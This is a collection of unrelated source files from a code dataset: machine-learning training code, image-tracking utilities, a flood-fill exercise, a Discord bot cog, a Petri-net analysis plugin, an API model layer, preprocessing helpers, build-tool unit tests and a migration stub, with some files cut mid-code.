tf.summary.FileWriter(os.path.join(LOG_DIR, 'test'), sess.graph)\n\n sess.run(init) # Init variables\n\n # Load the model\n latest_ckpt = tf.train.latest_checkpoint(LOG_DIR)\n print(FLAGS.load_ckpt)\n if FLAGS.load_ckpt is not None:\n saver.restore(sess, FLAGS.load_ckpt)\n print('{}-Checkpoint loaded from {}!'.format(datetime.now(), FLAGS.load_ckpt))\n else:\n if latest_ckpt:\n print('{}-Found checkpoint {}'.format(datetime.now(), latest_ckpt))\n saver.restore(sess, latest_ckpt)\n print('{}-Checkpoint loaded from {} (Iter {})'.format(\n datetime.now(), latest_ckpt, sess.run(global_step)))\n\n ops = {'input_pl': input_pl,\n 'label_pl': label_pl,\n 'inner_label_pl': inner_label_pl,\n 'training_pl': training_pl,\n 'pred': pred,\n 'loss': total_loss,\n 'train_op': train_op,\n 'merged': merged,\n 'global_step': global_step,\n 'end_points': end_points}\n\n if latest_ckpt:\n checkpoint_epoch = int(latest_ckpt.split('-')[-1])+1\n elif FLAGS.load_ckpt is not None:\n checkpoint_epoch = int(FLAGS.load_ckpt.split('-')[-1])+1\n else:\n checkpoint_epoch = 0\n\n for epoch in range(checkpoint_epoch, MAX_EPOCH):\n log_string('**** EPOCH %03d ****' % (epoch))\n sys.stdout.flush()\n\n # sess.run(global_step.initializer)\n\n print('learning rate:',sess.run(learning_rate))\n print('global step:', sess.run(global_step))\n\n sess.run(train_iterator.initializer)\n train_one_epoch(sess, ops, next_train_element, train_writer)\n\n log_string(str(datetime.now()))\n log_string('---- EPOCH %03d EVALUATION ----' %(epoch))\n\n sess.run(test_iterator.initializer)\n eval_one_epoch(sess, ops, next_test_element, test_writer)\n\n save_path = saver.save(sess, os.path.join(LOG_DIR, \"model.ckpt\"), global_step=epoch)\n log_string(\"Model saved in file: %s\" % save_path)\n # =====================================The End=====================================\n\n\ndef train_one_epoch(sess, ops, next_train_element, train_writer):\n \"\"\" ops: dict mapping from string to tf ops \"\"\"\n log_string(str(datetime.now()))\n\n # Make sure batch data is of same size\n cur_batch_input = np.zeros((BATCH_SIZE, NUM_POINT, INPUT_DIM))\n cur_batch_label = np.zeros((BATCH_SIZE, NUM_POINT), dtype=np.int32)\n cur_batch_inner = np.zeros((BATCH_SIZE, NUM_POINT), dtype=np.int32)\n\n total_correct = 0\n total_seen = 0\n loss_sum = 0\n batch_idx = 0\n\n train_time = 0.0\n while True:\n try:\n padded_all = sess.run(next_train_element)\n bsize = padded_all.shape[0]\n #print(padded_all.shape)\n\n # remove the padded data, select NUM_POINT point using np.random.choice\n batch_input = np.zeros((bsize, NUM_POINT, INPUT_DIM))\n batch_label = np.zeros((bsize, NUM_POINT), dtype=np.int32)\n batch_inner = np.zeros((bsize, NUM_POINT), dtype=np.int32)\n for b in range(bsize):\n loc = np.where(padded_all[b,:,-1]<0)\n if len(loc[0])==0:\n num = padded_all.shape[1]\n else:\n num = loc[0][0]\n\n if num==0:\n print(loc, padded_all[b, 0:10, :])\n print('problem of train')\n exit()\n\n if num str:\n num1 = list(num1)\n num2 = list(num2)\n\n carry = 0\n res = \"\"\n\n while num1 or num2 or carry:\n if num1:\n carry += ord(num1.pop()) - ord('0')\n\n if num2:\n carry += ord(num2.pop()) - ord('0')\n\n res += str(carry % 10)\n carry //= 10\n\n return res[::-1]\n","sub_path":"addStrings.py","file_name":"addStrings.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15000345","text":"import cv2 as cv\nimport sys\nimport numpy as np\nimport pickle\nimport math\nsys.path.insert(0, r'./TadroBeaconTracker/tadro-tracker/2Led/')\nfrom logger import *\nimport operator\n\ndef add_t(a, b):\n '''dodanie dwoch punktow, tuple '''\n return tuple(map(operator.add, a, b))\n\ndef sub_t(a, b):\n '''dodanie dwoch punktow, tuple '''\n return tuple(map(operator.sub, a, b))\n\ndef save_image(image, fileName, path):\n try:\n cv.imwrite(f'{path}\\\\{fileName}.png', image)\n log_info('Zapis obrazu zakończony powodzeniem.\\n'\n f'File path: {path}\\{fileName}.bmp')\n except Exception as error:\n log_warn(f'Obraz nie został zapisany do pliku.', error)\n pass\n\ndef save_thresholds(thresholds : dict, pathToFile):\n with open(pathToFile, 'wb') as file:\n try:\n pickle.dump(thresholds, file)\n log_info('Thresholds has been saved to file.\\n'\n f'File path: {pathToFile}')\n except Exception as error:\n log_warn(f'Thresholds nie został zapisany do pliku.', error)\n pass\n\ndef load_thresholds(thresholds, pathToFile):\n try:\n with open(pathToFile, 'rb') as file:\n thresholds = pickle.load(file)\n log_info('Thresholds został załadowany.')\n return thresholds\n except Exception as error:\n log_warn(f'Thresholds nie został załadowany.', error)\n return thresholds\n finally:\n # aktualizacja pozycji sliderów\n for j in range(len(thresholds)):\n for x in ['low_red', 'high_red', 'low_green', 'high_green', 'low_blue', 'high_blue']:\n #'low_hue', 'high_hue', 'low_sat', 'high_sat', 'low_val', 'high_val']:\n cv.setTrackbarPos(x, f'Sliders_{j}', thresholds[j][x])\n\n \ndef generate_path_image(DATA, step = 1):\n #makes the output image produce RGBA (A for Alpha, allowing for transparent pixels)\n #instead of just RBG like the input image. 4 channels instead of three\n shape = (DATA.processed_image.shape[0], DATA.processed_image.shape[1], 3)\n path_image = np.ones(shape)\n col = (0,0,0)\n counter = 0\n # for i, unpackedRobot in enumerate(DATA.robot_data):\n for i in range(0, len(DATA.robot_data), step):\n unpackedRobot = DATA.robot_data[i]\n if len(unpackedRobot) == 7:\n led1_pos, led2_pos, time, robot_center, heading, diamater, axle_len = unpackedRobot\n else:\n time, robot_center, heading, diamater, axle_len = unpackedRobot\n\n if (robot_center== None):\n continue\n '''\n if (counter == 0):\n col = np.array([255, 255, x[0]%256], copy=True)\n elif(counter == 1):\n col = np.array([x[0]%256, 255, 255], copy=True)\n elif(counter == 2):\n col = np.array([255, x[0]%256, 255], copy=True)\n \n if (x[0]%256 == 0):\n counter += 1\n counter = counter%3\n '''\n\n if (counter == 0):\n col = (255, 0, i%256)\n elif(counter == 1):\n col = (i%256, 0, 255)\n elif(counter == 2):\n col = (0, i%256, 255)\n \n if (i%256 == 0):\n counter += 1\n counter = counter%3\n \n #led2 = led2_pos\n #led1 = led1_pos\n #angle of arrow in radians\n #arrow_angle = .3\n #rotating the led1 LED about the front LED to make an arrow\n #right_shift_led1_x = int(led2[0] + (led1[0] -right_shift_led1_x = int(led2[0] + (led1[0] -right_shift_led1_x = int(led2[0] + (led1[0] - led2[0])*math.cos(arrow_angle) - (led1[1] - led2[1])*math.sin(arrow_angle))\n #right_shift_led1_y = int(led2[1] + (led1[1] - led2[1])*math.cos(arrow_angle) - (led1[0] - led2[0])*math.sin(arrow_angle))\n\n #left_shift_led1_x = int(led2[0] + (led1[0] - led2[0])*math.cos(-1*arrow_angle) - (led1[1] - led2[1])*math.sin(-1*arrow_angle))\n #left_shift_led1_y = int(led2[1] + (led1[1] - led2[1])*math.cos(-1*arrow_angle) - (led1[0] - led2[0])*math.sin(-1*arrow_angle))\n \n centre = robot_center\n head_point = add_t(centre, (20*math.cos(heading), 20*math.sin(heading)))\n head_point = tuple(map(round, head_point))\n cv.line(path_image, centre, head_point, col, 2)\n cv.circle(path_image, centre, 5, (255,255,0), 2)\n #cv.line(path_image, (right_shift_led1_x, right_shift_led1_y), led2, col, 2)\n #cv.line(path_image, (left_shift_led1_x, left_shift_led1_y), led2, col, 2) \n #log_print col\n #cv.circle(path_image, x[1], 1, copy.copy(col))\n #cv.imshow('Path_Image', path_image)\n return path_image\n\ndef draw_path_image(image, data):\n #makes the output image produce RGBA (A for Alpha, allowing for transparent pixels)\n #instead of just RBG like the input image. 4 channels instead of three\n shape = (image.shape[0], image.shape[1], 3)\n path_image = np.zeros(shape)\n col = (0,0,0)\n counter = 0\n for i, robot in enumerate(data):\n if (robot.robot_center == None):\n continue\n '''\n if (counter == 0):\n col = np.array([255, 255, x[0]%256], copy=True)\n elif(counter == 1):\n col = np.array([x[0]%256, 255, 255], copy=True)\n elif(counter == 2):\n col = np.array([255, x[0]%256, 255], copy=True)\n \n if (x[0]%256 == 0):\n counter += 1\n counter = counter%3\n '''\n\n if (counter == 0):\n col = (255, 0, i%256)\n elif(counter == 1):\n col = (i%256, 0, 255)\n elif(counter == 2):\n col = (0, i%256, 255)\n \n if (i%256 == 0):\n counter += 1\n counter = counter%3\n \n led2 = robot.led2_pos\n led1 = robot.led1_pos\n #angle of arrow in radians\n arrow_angle = .3\n #rotating the led2 LED about the led1 LED to make an arrow\n right_shift_led2_x = int(led1[0] + (led2[0] - led1[0])*math.cos(arrow_angle) - (led2[1] - led1[1])*math.sin(arrow_angle))\n right_shift_led2_y = int(led1[1] + (led2[1] - led1[1])*math.cos(arrow_angle) - (led2[0] - led1[0])*math.sin(arrow_angle))\n\n left_shift_led2_x = int(led1[0] + (led2[0] - led1[0])*math.cos(-1*arrow_angle) - (led2[1] - led1[1])*math.sin(-1*arrow_angle))\n left_shift_led2_y = int(led1[1] + (led2[1] - led1[1])*math.cos(-1*arrow_angle) - (led2[0] - led1[0])*math.sin(-1*arrow_angle))\n\n cv.line(path_image, led2, led1, col, 2)\n cv.circle(path_image, led1 - led2, 5, (255,255,0), 2)\n #cv.line(path_image, (right_shift_led2_x, right_shift_led2_y), led1, col, 2)\n #cv.line(path_image, (left_shift_led2_x, left_shift_led2_y), led1, col, 2) \n #log_print col\n #cv.circle(path_image, x[1], 1, copy.copy(col))\n #cv.imshow('Path_Image', image)\n return path_image\n\ndef map_real_to_img(valueReal, imgMax, realMax):\n # x = xR * k\n # k = xw / xRw\n return round(valueReal * imgMax/float(realMax))\n\ndef map_point_to_img(pointReal, imgMaxTuple, realMaxTuple):\n x = round(pointReal[0] * imgMaxTuple[1]/float(realMaxTuple[1])) # x * imgW / realW\n y = round(pointReal[1] * imgMaxTuple[0]/float(realMaxTuple[0]))\n return (x, y)\n\ndef map_img_to_real(valueImg, imgMax, realMax):\n # x = xR * k\n # k = xw / xRw\n return valueImg * realMax/float(imgMax)\n\ndef map_point_to_real(pointImg, imgMaxTuple, realMaxTuple):\n x = round(pointImg[0] * realMaxTuple[1]/float(imgMaxTuple[1]))\n y = round(pointImg[1] * realMaxTuple[0]/float(imgMaxTuple[0]))\n return (x, y)","sub_path":"2Led/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562679800","text":"'''\r\n\r\nDefiniamo adiacenti di un pixel p di un immagine i pixel adiacenti a p in orizzontale o in verticale.\r\nSe un pixel e' sul bordo dell'immagine il suo vicinato non comprende i pixel non contenuti nell'immagine.\r\nIl pixel dell'immagine con coordinate(x,y) ha dunque come adiacenti i pixel \r\ncon coordinate (x-1,y),(x+1,y),(x,y-1),(x,y+1) appartenenti all'immagine. \r\n \r\nDefiniamo connessi due pixel se e' possibile da0ll'uno raggiungere l'altro spostandosi solo su \r\npixel adiacenti e dello stesso colore (ovviamente perche' cio' sia possobile e' necessario \r\nche i due pixel abbiano lo stesso colore).\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione ricolora(fname, lista, fnameout) che presi:\r\n- il percorso di un file che contiene un'immagine in formato PNG\r\n- una lista di quadruple del tipo (x,y,c1,c2) dove x e y sono coordinate di un pixel dell'immagine e c1 e c2 due triple colore RGB\r\n- il percorso di un file (fnameout) da creare\r\nlegge l'immagine in fname, esegue un'operazione di ricolorazione di alcuni pixel dell'immagine e \r\nregistra l'immagine ricolorata nel file fnameout.\r\n\r\nL'operazione di ricolorazione e' la seguente. Per ciascuna delle quadruple (x,y,c1,c2) della lista (nell'ordine), \r\n- tutti i pixel connessi al pixel di coordinate (x,y) nell'immagine vanno ricolorati col colore c1, \r\n- tutti i pixel del perimetro (che si trovano sul 'bordo') della zona che si e' appena colorata devono essere ricolorati col colore c2.\r\nIl perimetro della zona colorata è l'insieme dei pixel che non hanno tutti e 4 i vicini che fanno parte della zona ricolorata \r\n(ovvero almeno uno è di un colore diverso da quello che si sta ricolorando oppure almeno uno non esiste perchè sarebbe fuori dall'immagine)\r\n\r\nSi consideri ad esempio l'immagine 'I1.png', l'invocazione di ricolora('I1.png',[(10,10,(255,0,0), (0,0,255))],’OUT1.png')\r\nprodurra' l'immagine 'OUT1.png' identica all'immagine di partenza se non per il fatto che,\r\n tutti i pixel adiacenti al pixel di coordinate (10,10) (e di colore verde), verranno ricolorati \r\n di rosso ((255,0,0)), mentre i pixel sul bordo della zona inizialmente verde vengono ricolorati di blu.\r\n\r\nPer ciascuna area ricolorata bisogna inoltre calcolare area interna e perimetro, che sono definite come segue:\r\n- l'area interna e' il numero di pixel ricolorati con il colore c1\r\n- il perimetro è il numero di pixel ricolorati con il colore c2\r\n\r\nLa funzone deve tornare la lista di coppie (area interna, perimetro) nello stesso ordine in cui sono state colorate le aree.\r\n \r\nPer altri esempi vedere il file grade03.txt \r\n'''\r\n\r\nfrom immagini import *\r\nimport sys\r\nimport time\r\nsys.setrecursionlimit(5500)\r\n\r\nrosso = (255, 0, 0)\r\nblu = ( 0, 0, 255)\r\nverde = ( 0, 255, 0)\r\nnero = ( 0, 0, 0)\r\nbianco= (255, 255, 255)\r\ngiallo= (255, 255, 0)\r\ncyan = ( 0, 255, 255)\r\nmagenta= (255, 0, 255)\r\nlista=[(100,100,(255-x,255,255),(0,0,255-x)) for x in range(100)]\r\n\r\ndef ricolora(fname, lista, fnameout):\r\n '''Implementare qui la funzione'''\r\n img = load(fname)\r\n w=len(img[0])\r\n h=len(img)\r\n ris = []\r\n for task in lista:\r\n x,y,cArea,cPerim = task\r\n area, perimetro = coloraVicini(img,w,h,x,y,cArea,cPerim)\r\n ris.append((area,perimetro))\r\n\r\n \r\n save(img,fnameout)\r\n return ris\r\n\r\n\r\ndef inside(x,y,w,h):\r\n return 0<=x None:\n \"\"\"Set a new prefix for the bot in this server.\"\"\"\n sql = \"UPDATE guild_settings SET prefix=%s where guild_id=%s\"\n values = (new_prefix, ctx.guild.id)\n status = await db.sql_edit(sql, values)\n await db.cache_prefixes()\n if status:\n await ctx.send(f\"Prefix has been updated to {new_prefix}\")\n else:\n await ctx.send(\"Prefix could not be changed.\")\n\n\ndef setup(bot):\n bot.add_cog(GuildSettings(bot))\n logger.info(\"loaded\")\n","sub_path":"cogs/guild_settings.py","file_name":"guild_settings.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534502808","text":"\"\"\"\nThis is where the implementation of the plugin code goes.\nThe StateMachine-class is imported from both run_plugin.py and run_debug.py\n\"\"\"\nimport sys\nimport logging\nfrom webgme_bindings import PluginBase\n\n# Setup a logger\nlogger = logging.getLogger('StateMachine')\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler(sys.stdout) # By default it logs to stderr..\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass StateMachine(PluginBase):\n def main(self):\n core = self.core\n root_node = self.root_node\n META = self.META\n active_node = self.active_node\n\n places = []\n placesPaths = []\n transitions = []\n transitionPaths = []\n arcs = []\n\n #Collect all nodes\n nodes = core.load_sub_tree(active_node)\n\n #Separate nodes into types\n for node in nodes:\n if core.get_attribute(node, 'name') in (\"Place-Transition\", \"Transition-Place\"):\n arcs.append(node)\n elif core.get_attribute(node, 'name') in (\"Transition\"):\n transitions.append(node)\n elif core.get_attribute(node, 'name') in (\"Place\"):\n places.append(node)\n\n #Add transition paths to an array\n for transition in transitions:\n transitionPaths.append(core.get_path(transition))\n \n #Add place paths to an array\n for place in places:\n placesPaths.append(core.get_path(place))\n\n def isStateMachine():\n #Check if any Transitions dst is listed twice\n for path in transitionPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt > 1:\n return False\n\n #Check if any Transitions src is listed twice\n for path in transitionPaths:\n outplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n outplaceCt = outplaceCt + 1\n if outplaceCt > 1:\n return False\n \n return True\n\n def isMarkedGraph():\n #Check that every Place is listed exactly once as a Dst\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt != 1:\n return False\n\n #Check that every Place is listed exactly once as a Src\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n inplaceCt = inplaceCt + 1\n if inplaceCt != 1:\n return False \n\n return True\n\n def isFreeChoice():\n #Check if any Transition dst is listed twice\n for path in transitionPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt > 1:\n return False \n return True\n\n def isWorkflowNet():\n nodeSrc = {}\n #Check if there is a start node (Place node without an incoming arc)\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n nodeSrc[path] = inplaceCt\n\n\n val_list = list(nodeSrc.values())\n\n #Fail if there is more than 1 start node\n if val_list.count(0)>1:\n return False\n\n position = val_list.index(0)\n key_list = list(nodeSrc.keys())\n\n startNode = key_list[position]\n\n self.send_notification(f\"Start Node - {startNode}\")\n\n\n #Check if there is an end node (Place node without an incoming arc\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n inplaceCt = inplaceCt + 1\n nodeSrc[path] = inplaceCt\n\n val_list = list(nodeSrc.values())\n\n #Fail if there is more than 1 end node\n if val_list.count(0)>1:\n return False\n\n position = val_list.index(0)\n key_list = list(nodeSrc.keys())\n\n endNode = key_list[position]\n\n self.send_notification(f\"End Node - {endNode}\")\n\n #Check if every Place node can reach the start node\n\n #Check if every Place node can reach the end node\n return False\n \n\n StateMachineResult = isStateMachine()\n FreeChoiceResult = isFreeChoice()\n MarkedGraphResult = isMarkedGraph()\n WorkflowNetResult = isWorkflowNet()\n\n self.send_notification(f\"StateMachine - {StateMachineResult}\")\n self.send_notification(f\"Free Choice - {FreeChoiceResult}\")\n self.send_notification(f\"Marked Graph - {MarkedGraphResult}\")\n self.send_notification(f\"Workflow Net - {WorkflowNetResult}\")\n \n \n \n \n \n \n \n \n","sub_path":"src/plugins/StateMachine/StateMachine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"177024680","text":"from copy import deepcopy\n\nfrom sendbee_api.fields import Field, ModelField, NumberField, TextField\n\n\nclass Model:\n \"\"\"Abstract model class.\"\"\"\n\n def __init__(self, item):\n self.item = item\n self.attributes = {}\n\n def __getattr__(self, item):\n if item in self.attributes.keys():\n attr = self.attributes.get(item)\n if attr:\n return self.attributes.get(item).value\n else:\n return attr\n else:\n raise AttributeError(item)\n\n @classmethod\n def process(cls, data):\n \"\"\"Transform raw data into models.\"\"\"\n\n model_list = []\n\n # iterate over formatted data from API call\n for item in data:\n\n # instantiate model with one row of data\n model_object = cls(item)\n\n # iterate over model properties\n for model_property in list(cls.__dict__):\n\n # invoke model property\n property_object = getattr(model_object,\n model_property)\n\n if isinstance(property_object, ModelField):\n\n # recursion:\n # if the instance of the field class is ModeClass\n # run process on that model with only a portion of data\n if isinstance(item[property_object.index], list):\n models = property_object.model_cls.process(\n item[property_object.index]\n )\n elif isinstance(item[property_object.index], dict):\n models = property_object.model_cls.process(\n [item[property_object.index]]\n )[0]\n\n setattr(model_object, model_property[1:], models)\n\n elif isinstance(property_object, Field):\n\n # convert raw property data into corespondent\n # data type defined by the Field class\n property_object.convert_item(model_object)\n\n # set model property value with formatted data\n if property_object.value is None:\n model_object.attributes[model_property[1:]] = None\n else:\n model_object.attributes[model_property[1:]] = \\\n deepcopy(property_object)\n\n model_list.append(model_object)\n\n return model_list\n\n\nclass Meta(Model):\n\n _total = NumberField(index='total', desc=\"Total\")\n _items_to = NumberField(index='to', desc=\"Items To\")\n _items_from = NumberField(index='from', desc=\"Items From\")\n _per_page = NumberField(index='per_page', desc=\"Per Page\")\n _last_page = NumberField(index='last_page', desc=\"Last Page\")\n _current_page = NumberField(index='current_page', desc=\"Current Page\")\n\n\nclass ServerMessage(Model):\n\n _message = TextField(index='message', desc='Message from the server')\n","sub_path":"sendbee_api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379601835","text":"import scipy.sparse as sps\nfrom sklearn.preprocessing import scale\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import Imputer\n\n\n#Categorical: a boolean array indicating which feature is categorical\n#bool_Imputer, bool_Standardization and bool_OneHotEncoder: boolean variables indicating whether to perform this type of data preprocessing method or not\n\n\ndef DataPreprocessing(Data_numeric, Categorical, bool_Imputer=True, bool_Standardization=True, bool_OneHotEncoder=True):\n \n if sps.issparse(Data_numeric):\n Data_numeric = Data_numeric.todense()\n\n if bool_Imputer:\n # whether there exist categorical features\n bool_cat = bool(np.sum(np.isfinite(np.where(np.asarray(Categorical)==True))))\n # whether there exist noncategorical features\n bool_noncat = bool(np.sum(np.isfinite(np.where(np.asarray(Categorical)==False))))\n \n \n if bool_cat:\n # categorical features\n Data_numeric_cat = Data_numeric[:,Categorical]\n # imputer for missing entries\n imp_cat = Imputer(missing_values='NaN', strategy='most_frequent', axis=0, copy=False)\n imp_cat.fit(Data_numeric_cat)\n Data_numeric_cat = imp_cat.transform(Data_numeric_cat)\n # number of categorical features\n num_cat = Data_numeric_cat.shape[1]\n \n \n if bool_noncat:\n \n #noncategorical features\n Data_numeric_noncat = Data_numeric[:,np.invert(Categorical)]\n imp_noncat = Imputer(missing_values='NaN', strategy='mean', axis=0, copy=False)\n imp_noncat.fit(Data_numeric_noncat)\n Data_numeric_noncat = imp_noncat.transform(Data_numeric_noncat)\n #number of noncategorical features\n num_noncat = Data_numeric_noncat.shape[1]\n\n #true if there exist both categorical and noncategorical features\n if bool_cat*bool_noncat:\n \n Data_numeric = np.concatenate((Data_numeric_cat, Data_numeric_noncat), axis=1)\n Categorical = [True for i in range(num_cat)] + [False for i in range(num_noncat)]\n\n #true if there only exist categorical features\n elif bool_cat*(not bool_noncat):\n Data_numeric = Data_numeric_cat\n Categorical = [True for i in range(num_cat)]\n \n #true if there only exist noncategorical features\n elif (not bool_cat)*bool_noncat:\n Data_numeric = Data_numeric_noncat\n Categorical = [False for i in range(num_noncat)]\n\n # OneHotEncoding for categorical features\n if bool_OneHotEncoder:\n \n #check if there exist categorical features\n if np.sum(np.isfinite(np.where(np.asarray(Categorical) == True))):\n enc=OneHotEncoder(categorical_features = Categorical)\n enc.fit(Data_numeric)\n Data_numeric = enc.transform(Data_numeric).toarray()\n \n # Standardization of all features\n if bool_Standardization:\n if bool_OneHotEncoder:\n Data_numeric = scale(Data_numeric)\n \n #check if there exist numerical features\n elif np.sum(np.isfinite(np.where(np.asarray(Categorical) == False))):\n Data_numeric[:,np.invert(Categorical)] = scale(Data_numeric[:,np.invert(Categorical)])\n\n print(\"DataPreprocessing finished\")\n return Data_numeric, Categorical\n","sub_path":"automl/preprocesser.py","file_name":"preprocesser.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"341006803","text":"# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport unittest\n\nfrom pants.java.jar.jar_dependency_utils import M2Coordinate, ResolvedJar\n\n\nclass JarDependencyUtilsTest(unittest.TestCase):\n def test_m2_string_representation(self):\n org_name_ref = M2Coordinate(org='org.example', name='lib', rev='the-rev')\n\n self.assertEquals('org.example:lib:the-rev', str(org_name_ref))\n self.assertEquals(org_name_ref, M2Coordinate.from_string(str(org_name_ref)))\n\n org_name_ref_classifier = M2Coordinate(org='org.example', name='lib',\n rev='the-rev', classifier='classify')\n\n self.assertEquals('org.example:lib:jar:classify:the-rev', str(org_name_ref_classifier))\n self.assertEquals(org_name_ref_classifier, M2Coordinate.from_string(str(org_name_ref_classifier)))\n\n org_name_classifier = M2Coordinate(org='org.example', name='lib', classifier='classify')\n\n self.assertEquals('org.example:lib:jar:classify:', str(org_name_classifier))\n self.assertEquals(org_name_classifier, M2Coordinate.from_string(str(org_name_classifier)))\n\n org_name_type_classifier = M2Coordinate(org='org.example', name='lib',\n classifier='classify', ext='zip')\n\n self.assertEquals('org.example:lib:zip:classify:', str(org_name_type_classifier))\n self.assertEquals(org_name_type_classifier, M2Coordinate.from_string(str(org_name_type_classifier)))\n\n org_name_type_jar_classifier = M2Coordinate(org='org.example', name='lib',\n classifier='classify', ext='jar')\n\n self.assertEquals('org.example:lib:jar:classify:', str(org_name_type_jar_classifier))\n self.assertEquals(org_name_type_jar_classifier, M2Coordinate.from_string(str(org_name_type_jar_classifier)))\n\n def test_m2_coordinates_with_same_properties(self):\n coordinate1 = M2Coordinate('org.example', 'lib')\n coordinate2 = M2Coordinate('org.example', 'lib')\n\n self.assertEqual(coordinate1, coordinate2)\n self.assertEqual(hash(coordinate1), hash(coordinate2))\n\n def test_m2_coordinates_with_differing_properties_not_equal(self):\n coordinate1 = M2Coordinate('org.example', 'lib')\n coordinate2 = M2Coordinate('org.example', 'lib2')\n\n self.assertNotEqual(coordinate1, coordinate2)\n\n def test_m2_coordinates_with_different_types_have_different_hashes(self):\n coordinate1 = M2Coordinate('org.example', 'lib', ext='zip')\n coordinate2 = M2Coordinate('org.example', 'lib')\n\n self.assertNotEqual(hash(coordinate1), hash(coordinate2))\n\n def test_m2_coordinate_artifact_path_no_rev(self):\n coordinate = M2Coordinate('org.example', 'lib')\n\n self.assertEqual('org.example-lib.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_no_classifier(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0')\n\n self.assertEqual('org.example-lib-1.0.0.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_classifier(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0', 'sources')\n\n self.assertEqual('org.example-lib-1.0.0-sources.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_explicit_ext(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0', ext='tar.gz')\n\n self.assertEqual('org.example-lib-1.0.0.tar.gz', coordinate.artifact_filename)\n\n def test_resolved_jars_with_same_properties(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path')\n\n self.assertEqual(jar1, jar2)\n self.assertEqual(hash(jar1), hash(jar2))\n\n def test_resolved_jars_with_differing_cache_paths_not_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path1')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path2')\n\n self.assertNotEqual(jar1, jar2)\n\n def test_resolved_jars_with_differing_paths_not_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path1')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path2')\n\n self.assertNotEqual(jar1, jar2)\n\n def test_resolved_jars_with_same_paths_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path')\n\n self.assertEqual(jar1, jar2)\n\n def test_m2_coordinate_create_noop(self):\n m2 = M2Coordinate(org='a', name='b', rev='c', classifier='d', ext='e')\n m2_new = M2Coordinate.create(m2) # Should just return the original object.\n self.assertIs(m2, m2_new)\n\n def test_m2_coordinate_create(self):\n attrs = ('org', 'name', 'rev', 'classifier', 'ext')\n\n class CoordinateLike(object):\n def __init__(self):\n for i, a in enumerate(attrs):\n setattr(self, a, chr(i+ord('a'))) # Set attrs to the first few letters in the alphabet.\n\n coord = CoordinateLike()\n m2 = M2Coordinate.create(coord)\n self.assertNotEqual(m2, coord)\n self.assertEquals(tuple(getattr(coord, a) for a in attrs),\n tuple(getattr(m2, a) for a in attrs))\n\n def test_m2_coordinate_unversioned_noop(self):\n m2 = M2Coordinate(org='a', name='b', rev=None, classifier='d', ext='e')\n m2_un = M2Coordinate.unversioned(m2) # Should just return the original object.\n self.assertIs(m2, m2_un)\n\n def test_m2_coordinate_unversioned(self):\n m2 = M2Coordinate(org='a', name='b', rev='c', classifier='d', ext='e')\n m2_un = M2Coordinate.unversioned(m2)\n self.assertNotEquals(m2, m2_un)\n self.assertTrue(m2_un.rev is None)\n","sub_path":"tests/python/pants_test/backend/jvm/test_jar_dependency_utils.py","file_name":"test_jar_dependency_utils.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"19675780","text":"\"\"\"Added Pipeline Archive model\n\nRevision ID: c789ecdb563c\nRevises: 5e23f85605a5\nCreate Date: 2016-09-14 13:38:06.578309\n\n\"\"\"\n\n# revision identifiers, used by 